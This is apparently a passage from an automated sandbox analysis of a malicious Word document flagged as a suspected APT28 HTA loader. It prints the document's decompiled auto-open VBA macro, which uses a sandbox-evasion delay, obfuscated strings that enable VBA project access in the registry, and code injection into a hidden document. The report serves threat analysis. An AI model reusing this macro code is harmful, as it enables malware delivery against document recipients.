              Programmed in:C, C++ or other language
              Reputation:moderate
              Has exited:false

              General

              Target ID:7
              Start time:15:37:26
              Start date:13/01/2025
              Path:C:\Program Files\Microsoft Office\root\Office16\WINWORD.EXE
              Wow64 process (32bit):false
              Commandline:"C:\Program Files\Microsoft Office\Root\Office16\WINWORD.EXE" /Automation -Embedding
              Imagebase:0x7ff63f440000
              File size:1'637'952 bytes
              MD5 hash:A9F0EC89897AC6C878D217DFB64CA752
              Has elevated privileges:true
              Has administrator privileges:true
              Programmed in:C, C++ or other language
              Reputation:moderate
              Has exited:true

              General

              Target ID:9
              Start time:15:37:31
              Start date:13/01/2025
              Path:C:\Windows\System32\mshta.exe
              Wow64 process (32bit):false
              Commandline:"C:\Windows\System32\mshta.exe" C:\Users\user\AppData\Local\Lookup\Dispatch
              Imagebase:0x7ff64baa0000
              File size:32'768 bytes
              MD5 hash:36D15DDE6D71802D9588CC0D48EDF8EA
              Has elevated privileges:false
              Has administrator privileges:false
              Programmed in:C, C++ or other language
              Yara matches:
              • Rule: apt_susp_apt28_uac0063_hta_loader, Description: Detects some suspected APT28 HTA loader, Source: 00000009.00000002.2895883202.0000027C804F0000.00000004.00000800.00020000.00000000.sdmp, Author: Sekoia.io
              Reputation:moderate
              Has exited:false

              Disassembly

              Code Analysis

              Call Graph

              Module: ThisDocument

              Declaration
              LineContent
              1

              Attribute VB_Name = "ThisDocument"

              2

              Attribute VB_Base = "1Normal.ThisDocument"

              3

              Attribute VB_GlobalNameSpace = False

              4

              Attribute VB_Creatable = False

              5

              Attribute VB_PredeclaredId = True

              6

              Attribute VB_Exposed = True

              7

              Attribute VB_TemplateDerived = True

              8

              Attribute VB_Customizable = True

              9

              Public objApp, wsl

              Executed Functions

              Subroutine

              documeNt_opEnAPIs: 34, Strings: 6, Number of lines: 28, Relevance: 88.028

              APIsMeta Information

              Unprotect

              Shapes

              ActiveDocument

              Panes

              Delete

              Save

              Now

              Now

              TimeValue

              DoEvents

              Now

              TimeValue

              Part of subcall function verydanger@ThisDocument: CreateObject

              Part of subcall function verydanger@ThisDocument: RegWrite

              Part of subcall function verydanger@ThisDocument: Version

              Part of subcall function verydanger@ThisDocument: Application

              CreateObject

              		CreateObject("Word.Application") -> Microsoft Word

              Visible

              Documents

              Variables

              ActiveDocument

              Add

              Name

              AddFromString

              vbCrLf

              Part of subcall function danger@ThisDocument: Item

              ExpandEnvironmentStrings

              		IWshShell3.ExpandEnvironmentStrings("%localappdata%\Temp") -> C:\Users\Ganji\AppData\Local\Temp

              Name

              ActiveDocument

              SaveAs2

              Close

              Part of subcall function kokokokoko@ThisDocument: Open

              Part of subcall function kokokokoko@ThisDocument: Save

              Part of subcall function kokokokoko@ThisDocument: Close

              StringsDecrypted Strings
              "oikmseM#*inmowefj8349an3"
              "00:00:15"
              "Word.Application"
              "Sub goods() : : End Sub"
              "ThisDocument"
              "%localapp""data%\T""emp"
              LineInstructionMeta Information
              24

              Sub documeNt_opEn()

              25

              On Error Resume Next

              executed
              26

              ActiveDocument.Unprotect ("oikmseM#*inmowefj8349an3")

              Unprotect

              27

              For i = ActiveDocument.Shapes.Count To ActiveDocument.Shapes.Count + 1 - ActiveDocument.ActiveWindow.Panes(1).Pages.Count * 2 Step - 1

              Shapes

              ActiveDocument

              Panes

              28

              ActiveDocument.Shapes(i).Delete

              Delete

              29

              Next i

              Shapes

              ActiveDocument

              Panes

              30

              ActiveDocument.Save

              Save

              31

              sss = Now()

              Now

              32

              While Now < sss + TimeValue("00:00:20")

              Now

              TimeValue

              33

              DoEvents

              DoEvents

              34

              Wend

              Now

              TimeValue

              35

              If Now() - sss < TimeValue("00:00:15") Then

              Now

              TimeValue

              35

              Exit Sub

              35

              Endif

              36

              verydanger

              37

              Set objApp = CreateObject("Word.Application")

              CreateObject("Word.Application") -> Microsoft Word

              executed
              38

              objApp.Visible = False

              Visible

              39

              Set doc = objApp.Documents.Add

              Documents

              40

              For Each vars in ActiveDocument.Variables

              Variables

              ActiveDocument

              41

              doc.Variables.Add vars.Name & "ergegdr", vars

              Add

              Name

              42

              i = i + 1

              43

              Next

              Variables

              ActiveDocument

              44

              doc.VBProject.VBComponents("ThisDocument").CodeModule.AddFromString "Sub goods() : : End Sub" & vbCrLf & "Sub baads() : : End Sub" & vbCrLf & danger()

              AddFromString

              vbCrLf

              45

              tmp = wsl.ExpandEnvironmentStrings("%localapp" & "data%\T" & "emp") & "\" & ActiveDocument.Name & ".doc"

              IWshShell3.ExpandEnvironmentStrings("%localappdata%\Temp") -> C:\Users\Ganji\AppData\Local\Temp

              Name

              ActiveDocument

              executed
              46

              doc.SaveAs2 tmp, 13

              SaveAs2

              47

              doc.Close

              Close

              48

              kokokokoko (tmp)

              49

              End Sub

              Function

              kokokokokoAPIs: 3, Strings: 0, Number of lines: 5, Relevance: 10.505

              APIsMeta Information

              Open

              		Documents.Open("C:\Users\Ganji\AppData\Local\Temp\RoYAd85faz.doc.doc")

              Save

              Close

              LineInstructionMeta Information
              13

              Function kokokokoko(namedoc)

              14

              Set doc2 = objApp.Documents.Open(namedoc)

              Documents.Open("C:\Users\Ganji\AppData\Local\Temp\RoYAd85faz.doc.doc")

              executed
              15

              doc2.Save

              Save

              16

              doc2.Close

              Close

              17

              End Function

              Subroutine

              verydangerAPIs: 4, Strings: 3, Number of lines: 6, Relevance: 14.006

              APIsMeta Information

              CreateObject

              		CreateObject("WScript.Shell")

              RegWrite

              Version

              Application

              StringsDecrypted Strings
              "WSc""ript.She"
              "HK""CU\Softw""are\Micr""osoft\Of""fice\"
              "REG_D""WORD"
              LineInstructionMeta Information
              18

              Sub verydanger()

              19

              strng = "WSc" & "ript.She"

              executed
              20

              strng = strng & "ll"

              21

              Set wsl = CreateObject(strng)

              CreateObject("WScript.Shell")

              executed
              22

              wsl.RegWrite "HK" & "CU\Softw" & "are\Micr" & "osoft\Of" & "fice\" & Application.Version & "\Wo" & "rd\Sec" & "urity\Acce" & "ssVBO" & "M", 1, "REG_D" & "WORD"

              RegWrite

              Version

              Application

              23

              End Sub

              Function

              dangerAPIs: 1, Strings: 1, Number of lines: 3, Relevance: 3.003

              APIsMeta Information

              Item

              StringsDecrypted Strings
              "s2"
              LineInstructionMeta Information
              10

              Function danger()

              11

              danger = ActiveDocument.Variables.Item("s2")

              Item

              executed
              12

              End Function

              Reset < >